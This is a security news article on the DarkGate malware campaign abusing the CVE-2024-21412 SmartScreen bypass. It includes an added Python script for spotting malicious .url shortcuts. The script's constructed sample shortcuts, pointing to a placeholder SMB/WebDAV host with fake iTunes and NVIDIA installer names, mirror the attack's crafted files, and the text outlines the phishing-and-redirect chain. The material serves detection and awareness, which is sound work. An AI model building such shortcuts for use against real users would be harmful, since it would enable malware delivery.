Windows users, beware: DarkGate exploits a zero-day vulnerability

Teacher
The SmartScreen security bug served attackers well. Maybe you were one of its victims, too?

In mid-January, security researchers noticed a new large-scale campaign distributing the DarkGate malware. It exploited a vulnerability in Microsoft Windows SmartScreen that had not yet been patched at the time, that is, it was used as a zero-day; Microsoft fixed it only afterwards.

According to Trend Micro, the attacks began with PDF files containing Google DoubleClick Digital Marketing (DDM) open redirects that led victims to compromised sites. Those sites served files exploiting CVE-2024-21412, which bypasses Windows SmartScreen, and went on to launch malicious installers in ".msi" format that mimicked the popular iTunes, Notion and NVIDIA applications.

CVE-2024-21412, an Internet Shortcut file security feature bypass with a CVSS score of 8.1, allows an unauthenticated attacker to bypass SmartScreen protection by getting the user to open a specially crafted file; SmartScreen then shows no warning before the referenced payload runs.
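The crafted file in this bypass is a Windows Internet Shortcut (.url) whose target is a second shortcut or an installer on a remote SMB/WebDAV share. The following triage script is an added example for this page, not code from the article or from Trend Micro: it parses .url files found in, say, a user's Downloads folder and flags that chain. The sample shortcuts are constructed (the host 192.0.2.10 is a TEST-NET documentation address), and the risk levels are the example's own convention.

```python
"""Triage Windows Internet Shortcut (.url) files for the CVE-2024-21412 abuse
pattern: a shortcut whose URL= target is a second .url or an installer on a
remote SMB/WebDAV share, which lets the payload run without a SmartScreen
prompt on unpatched hosts. Added example, not from the article; the samples
at the bottom are constructed, not real campaign artifacts."""
import re
from urllib.parse import urlparse

REMOTE_SCHEMES = {"smb", "webdav", "dav", "davs"}
RISKY_EXT = {".url", ".msi", ".lnk", ".exe", ".hta", ".js", ".vbs", ".cmd", ".bat"}


def parse_url_file(text: str) -> dict:
    """Return key/value pairs of the [InternetShortcut] section, keys lowercased.
    The format is INI-like; a hand parser copes with the extra sections such as
    [{000214A0-0000-0000-C000-000000000046}] that shortcut files often carry."""
    fields, in_section = {}, False
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            in_section = line[1:-1].lower() == "internetshortcut"
            continue
        if in_section and "=" in line:
            key, value = line.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields


def is_remote_target(target: str) -> bool:
    """True when the target is a network location rather than a local file or a
    plain web page: a UNC path (\\\\host\\share, including the WebDAV form
    \\\\host@80\\DavWWWRoot\\...), a file:// URL with a host part, or an
    explicit smb/webdav scheme."""
    if target.startswith("\\\\"):
        return True
    parsed = urlparse(target)
    scheme = parsed.scheme.lower()
    if scheme == "file":
        return bool(parsed.netloc)  # file:///C:/... has no host, so it is local
    return scheme in REMOTE_SCHEMES


def target_extension(target: str) -> str:
    """Lowercased extension of the last path component (query/fragment ignored)."""
    path = target if target.startswith("\\\\") else urlparse(target).path
    tail = re.split(r"[\\/]", path)[-1]
    return "." + tail.rsplit(".", 1)[1].lower() if "." in tail else ""


def triage(url_file_text: str) -> dict:
    """Classify one .url file: high = remote shortcut/installer/executable target
    (the CVE-2024-21412 chain), medium = any other remote target, low = the rest."""
    fields = parse_url_file(url_file_text)
    target = fields.get("url", "")
    result = {"target": target, "remote": False, "findings": [], "risk": "low"}
    if not target:
        result["findings"].append("no URL= entry in [InternetShortcut]")
        return result
    remote, ext = is_remote_target(target), target_extension(target)
    result["remote"] = remote
    if remote and ext == ".url":
        result["findings"].append("chains to a second .url on a remote share (CVE-2024-21412 pattern)")
        result["risk"] = "high"
    elif remote and ext in RISKY_EXT:
        result["findings"].append(f"launches a {ext} from a remote share (no SmartScreen prompt on unpatched hosts)")
        result["risk"] = "high"
    elif remote:
        result["findings"].append("target is on a remote share")
        result["risk"] = "medium"
    # Extra check beyond the article: a remote IconFile= makes Explorer fetch the
    # icon over SMB/WebDAV as soon as the shortcut is displayed.
    if "iconfile" in fields and is_remote_target(fields["iconfile"]):
        result["findings"].append("IconFile= points to a remote share (outbound SMB/WebDAV fetch on render)")
        if result["risk"] != "high":
            result["risk"] = "medium"
    return result


# Constructed samples (not real campaign artifacts); 192.0.2.10 is a TEST-NET address.
SAMPLES = {
    "benign": "[InternetShortcut]\r\nURL=https://www.example.com/\r\n",
    "chained_url": (
        "[InternetShortcut]\r\n"
        "URL=file://192.0.2.10/share/iTunes_setup.url\r\n"
        "IconIndex=13\r\n"
    ),
    "webdav_msi": (
        "[InternetShortcut]\r\n"
        "URL=\\\\192.0.2.10@80\\DavWWWRoot\\NVIDIA_Installer.msi\r\n"
        "[{000214A0-0000-0000-C000-000000000046}]\r\nProp3=19,2\r\n"
    ),
}

if __name__ == "__main__":
    for name, text in SAMPLES.items():
        r = triage(text)
        print(f"{name:12} risk={r['risk']:6} target={r['target']}")
        for finding in r["findings"]:
            print("             -", finding)
```

Run it over every .url file in user download and mail attachment folders; on a patched host the chain no longer bypasses SmartScreen, but a remote-share shortcut that arrived by mail or from an ad redirect is still worth a look, because the second-stage .url or .msi it points to is the actual DarkGate dropper.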

Microsoft fixed this vulnerability in the February 2024 Patch Tuesday update package, but until then it was used not only to distribute DarkGate but also to deliver the DarkMe malware of the Water Hydra group, whose attacks targeted financial institutions.

As for DarkGate, in this operation the attackers combined CVE-2024-21412 with Google ad (DoubleClick) redirects to spread the malware. The victim clicks a link in a PDF attached to a phishing email, is redirected to the attacker-controlled site, and downloads a file that exploits the vulnerability described above.

In addition to CVE-2024-21412, the experts also recorded the use of another Windows SmartScreen vulnerability for delivering DarkGate: CVE-2023-36025, with a CVSS score of 8.8, which the TA544 group had already exploited successfully back in November last year.

The researchers stress the importance of vigilance and of never installing software from untrusted sources. This applies both to fake installers and to the abuse of Google ad technologies, which lets attackers scale their campaigns.

They also note a growing number of new malware families capable of stealing confidential information, and an increasing use of popular platforms to distribute malware, often combined with social engineering.

The researchers' findings highlight how hard it is to secure today's cyberspace and the need for an integrated approach to digital protection for organizations and individual users alike.